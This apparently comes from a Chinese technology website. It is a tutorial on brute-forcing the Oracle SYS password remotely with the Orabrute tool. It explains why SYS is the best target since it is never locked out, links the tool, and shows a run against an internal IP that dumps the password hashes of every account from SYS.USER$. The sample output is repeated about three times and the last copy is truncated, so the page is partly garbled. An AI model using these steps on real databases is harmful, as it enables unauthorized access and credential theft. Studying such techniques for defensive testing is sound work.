通过Orabrute暴力破解oracle密码

安全 数据安全
本文详细介绍了如何通过Orabrute暴力破解oracle密码。

1 标准的Oracle 密码可以由英文字母,数字,#,下划线(_),美元字符($)构成,密码的最大长度为30 字符;Oracle 密码不能以"$","#","_"或任何数字开头;密码不能包含"SELECT","DELETE","CREATE"这类的Oracle/SQL 关键字。

2 Oracle 的弱算法加密机制:两个相同的用户名和密码在两台不同的Oracle 数据库机器中,将具有相同的

哈希值。这些哈希值存储在SYS.USER$表中。可以通过像DBA_USERS 这类的视图来访问。

3 Oracle 默认配置下,每个帐户如果有10 次的失败登录,此帐户将会被锁定。但是SYS 帐户在Oracle 数

据库中具有最高权限,能够做任何事情,包括启动/关闭Oracle 数据库。即使SYS 被锁定,也依然能够访问

数据库。

由前面的基础知识3,可以得知选择远程破解Oracle 的最好帐户是SYS,因为此帐户永远有效。在Oracle10g以前的版本在安装的时候并没有提示修改SYS 的默认密码,Oracle10g 虽然提示修改密码了,但是并没有检查密码的复杂性。

可以使用Orabrute 工具来进行远程破解,在使用这个工具的时候,需要系统提前安装好Sqlplus,该工具的

原理很简单,就是不停的调用Sqlplus 然后进行登录验证,帐户选择的是SYS,密码则为password.txt 中的密码单词。只要登录成功,就会调用selectpassword.sql 脚本抓取出在SYS.USER$表中的其他用户的哈希值,然后退出程序。这里有个注意的地方,当第二次运行Orabrute 的时候,需要删除或移动同目录下的前一次运行Orabrute 时生成的thepasswordsarehere.txt 和output.txt 文件。

Orabrute 的下载地址http://www.ngssoftware.com/research/papers/oraclepasswords.zip

Orabrute 的官方文档http://www.ngssoftware.com/research/papers/oraclepasswords.pdf#p#

Orabrute 的使用方法为:

D:\soft\oracle\Orabrute>orabrute 
Orabrute v 1.2 by Paul M. Wright and David J. Morgan: 
orabrute     
D:\soft\oracle\Orabrute> 

Orabrute 的破解速度比较慢,建议在password.txt开头加上诸如change_on_install这样你认为可能的密码。

D:\soft\oracle\Orabrute>orabrute 172.19.111.37 1521 orcl 2000 
Orabrute v 1.2 by Paul M. Wright and David J. Morgan: 
orabrute    sqlplus.exe -S -L "
SYS/change_on_install@172.19.111.37:1521/orcl" as sysdba @selectpassword.sql 
NAME                           PASSWORD 
------------------------------ ------------------------------ 
SYS                            D4C5016086B2DC6A 
PUBLIC 
CONNECT 
RESOURCE 
DBA 
SYSTEM                         D4DF7931AB130E37 
SELECT_CATALOG_ROLE 
EXECUTE_CATALOG_ROLE 
DELETE_CATALOG_ROLE 
EXP_FULL_DATABASE 
IMP_FULL_DATABASE 
NAME                           PASSWORD 
------------------------------ ------------------------------ 
OUTLN                          4A3BA55E08595C81 
RECOVERY_CATALOG_OWNER 
AQ_ADMINISTRATOR_ROLE 
AQ_USER_ROLE 
OEM_MONITOR 
HS_ADMIN_ROLE 
TRACESVR                       F9DA8977092B7B81 
WDEVELOPER 
AURORA$JIS$UTILITY$             000001501983169 
OSE$HTTP$ADMIN                  000001198644021 
AURORA$ORB$UNAUTHENTICATED     -000000728729637 
NAME                           PASSWORD 
------------------------------ ------------------------------ 
TIMESERIES_DEVELOPER 
TIMESERIES_DBA 
CTXAPP 
TOAD                           361001117A542AC1 
DBSNMP                         E066D214D5421CCC 
WACOS                          1AD491DE05C669FB 
UTCORE                         9C5CB992189E20D9 
NMS                            5E9DEFE765774DC1 
JAVA_ADMIN 
JAVA_DEPLOY 
SCHEDULER_ADMIN 
NAME                           PASSWORD 
------------------------------ ------------------------------ 
DIP                            CE4A36B8E06CA59C 
QUEST_SL_USER 
TSMSYS                         3DF26A8B17D0F29F 
OEM_ADVISOR 
JAVAUSERPRIV 
JAVAIDPRIV 
JAVASYSPRIV 
JAVADEBUGPRIV 
GATHER_SYSTEM_STATISTICS 
LOGSTDBY_ADMINISTRATOR 
GLOBAL_AQ_USER_ROLE            GLOBAL 
NAME                           PASSWORD 
------------------------------ ------------------------------ 
UTNEW                          C686642569070067 
_NEXT_USER 
TC_ADMIN_ROLE 
TC_MGR_ROLE 
TC_LDR_ROLE 
49 rows selected. 
NAME                           PASSWORD 
------------------------------ ------------------------------ 
SYS                            D4C5016086B2DC6A 
PUBLIC 
CONNECT 
RESOURCE 
DBA 
SYSTEM                         D4DF7931AB130E37 
SELECT_CATALOG_ROLE 
EXECUTE_CATALOG_ROLE 
DELETE_CATALOG_ROLE 
EXP_FULL_DATABASE 
IMP_FULL_DATABASE 
NAME                           PASSWORD 
------------------------------ ------------------------------
OUTLN                          4A3BA55E08595C81

 

RECOVERY_CATALOG_OWNER

AQ_ADMINISTRATOR_ROLE

AQ_USER_ROLE

OEM_MONITOR

HS_ADMIN_ROLE

TRACESVR                       F9DA8977092B7B81

WDEVELOPER

AURORA$JIS$UTILITY$             000001501983169

OSE$HTTP$ADMIN                  000001198644021

AURORA$ORB$UNAUTHENTICATED     -000000728729637

NAME                           PASSWORD

------------------------------ ------------------------------

TIMESERIES_DEVELOPER

TIMESERIES_DBA

CTXAPP

TOAD                           361001117A542AC1

DBSNMP                         E066D214D5421CCC

WACOS                          1AD491DE05C669FB

UTCORE                         9C5CB992189E20D9

NMS                            5E9DEFE765774DC1

JAVA_ADMIN
JAVA_DEPLOY
SCHEDULER_ADMIN

 

NAME                           PASSWORD
------------------------------ ------------------------------
DIP                            CE4A36B8E06CA59C

 

QUEST_SL_USER

TSMSYS                         3DF26A8B17D0F29F

OEM_ADVISOR

JAVAUSERPRIV

JAVAIDPRIV

JAVASYSPRIV

JAVADEBUGPRIV

GATHER_SYSTEM_STATISTICS

LOGSTDBY_ADMINISTRATOR

GLOBAL_AQ_USER_ROLE            GLOBAL

NAME                           PASSWORD

------------------------------ ------------------------------

UTNEW                          C686642569070067

_NEXT_USER

TC_ADMIN_ROLE

TC_MGR_ROLE

TC_LDR_ROLE

49 rows selected.

NAME                           PASSWORD

------------------------------ ------------------------------

SYS                            D4C5016086B2DC6A

PUBLIC

CONNECT

RESOURCE

DBA

SYSTEM                         D4DF7931AB130E37

SELECT_CATALOG_ROLE

EXECUTE_CATALOG_ROLE

DELETE_CATALOG_ROLE

EXP_FULL_DATABASE

IMP_FULL_DATABASE

NAME                           PASSWORD

------------------------------ ------------------------------

OUTLN                          4A3BA55E08595C81

RECOVERY_CATALOG_OWNER

AQ_ADMINISTRATOR_ROLE

AQ_USER_ROLE

OEM_MONITOR

HS_ADMIN_ROLE

TRACESVR                       F9DA8977092B7B81

WDEVELOPER

AURORA$JIS$UTILITY$             000001501983169

OSE$HTTP$ADMIN                  000001198644021

AURORA$ORB$UNAUTHENTICATED     -000000728729637

NAME                           PASSWORD

------------------------------ ------------------------------

TIMESERIES_DEVELOPER

TIMESERIES_DBA

CTXAPP

TOAD                           361001117A542AC1

DBSNMP                         E066D214D5421CCC

WACOS                          1AD491DE05C669FB

UTCORE                         9C5CB992189E20D9

NMS                            5E9DEFE765774DC1

JAVA_ADMIN

JAVA_DEPLOY

SCHEDULER_ADMIN

NAME                           PASSWORD

------------------------------ ------------------------------

DIP                            CE4A36B8E06CA59C

QUEST_SL_USER

TSMSYS                         3DF26A8B17D0F29F

OEM_ADVISOR

JAVAUSERPRIV

JAVAIDPRIV

JAVASYSPRIV

JAVADEBUGPRIV

GATHER_SYSTEM_STATISTICS

LOGSTDBY_ADMINISTRATOR

You will need to delete or move thepasswordsare.txt file befor

e running again.

D:\soft\oracle\Orabrute>

【编辑推荐】

  1. 定时修改unix密码的脚本,防止暴力破解
  2. 一个生成Oracle用户密码的通用小程序
责任编辑:许凤丽 来源: 华盟收集
相关推荐

2013-05-14 10:12:13

2012-01-01 22:08:10

2009-08-10 15:47:20

2010-08-18 10:17:12

2009-11-04 21:46:39

2023-09-11 07:17:30

2019-02-25 18:03:15

2014-12-02 09:22:19

2013-06-08 10:41:51

2011-11-29 10:03:24

2013-04-18 09:52:56

2022-08-06 13:04:27

LinuxSHH

2013-08-19 15:14:02

2012-09-06 09:53:49

2014-09-24 09:27:02

2011-04-02 09:34:38

2015-10-19 11:44:00

2021-07-09 05:20:14

暴力破解网络攻击Kubernetes集

2009-10-13 14:57:43

2015-07-14 17:12:49

点赞
收藏

51CTO技术栈公众号